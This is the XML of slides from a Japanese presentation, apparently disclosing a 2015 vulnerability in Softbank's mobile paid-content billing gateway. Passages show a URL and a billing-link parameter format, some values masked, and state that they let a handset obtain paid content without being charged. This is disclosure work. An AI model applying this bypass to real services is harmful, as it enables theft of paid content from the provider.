            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=B6V8&amp;reg=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>に端末でアクセスすることにより</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、課金処理を経ずに有料コンテンツを取得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>する</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t>ことが</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US"/>
              <a:t>出来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t>る</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="タイトル 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>実際の</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>応用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3087455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en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>2015</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>月現在、課金システムのリンクは、</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" dirty="0"/>
              <a:t>http://jphone/CONFON?sid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>=****&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" dirty="0"/>
              <a:t>nl=http://m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>.****.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" dirty="0"/>
              <a:t>jp/usr/regist.htm&amp;cl=http://m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>.****.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" dirty="0"/>
              <a:t>jp/arrange/index.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>の形式となっていて</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>jskycmi</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>によるパラメーター暗号化の機能（？）が消失しているため、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>本脆弱性の実行手順は簡易化でき、実行はより容易なものになっていると思われる。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="タイトル 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>補足・備考</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1385875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ユーザー定義 3">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="21798F"/>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TotalTime>
  <Words>315</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>画面に合わせる (4:3)</PresentationFormat>
  <Paragraphs>36</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Arial</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>ビジネス</vt:lpstr>
      <vt:lpstr>Softbank 有料コンテンツ 課金ゲートウェイの脆弱性</vt:lpstr>
      <vt:lpstr>1. Softbank 課金ゲートウェイURL</vt:lpstr>
      <vt:lpstr>添付画像1</vt:lpstr>
      <vt:lpstr>2. ?cl=パラメーターとaccess.logの挿入</vt:lpstr>
      <vt:lpstr>3. Accsess.logに記録された パラメーター</vt:lpstr>
      <vt:lpstr>4. 実際の応用</vt:lpstr>
      <vt:lpstr>補足・備考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Softbank 有料コンテンツ 課金ゲートウェイの脆弱性</dc:title>
  <dc:creator>佐藤　昇一郎;Sato Shoichiro</dc:creator>
  <cp:lastModifiedBy>User</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-08-27T09:29:22Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-08-27T14:39:33Z</dcterms:modified>
</cp:coreProperties>
</file>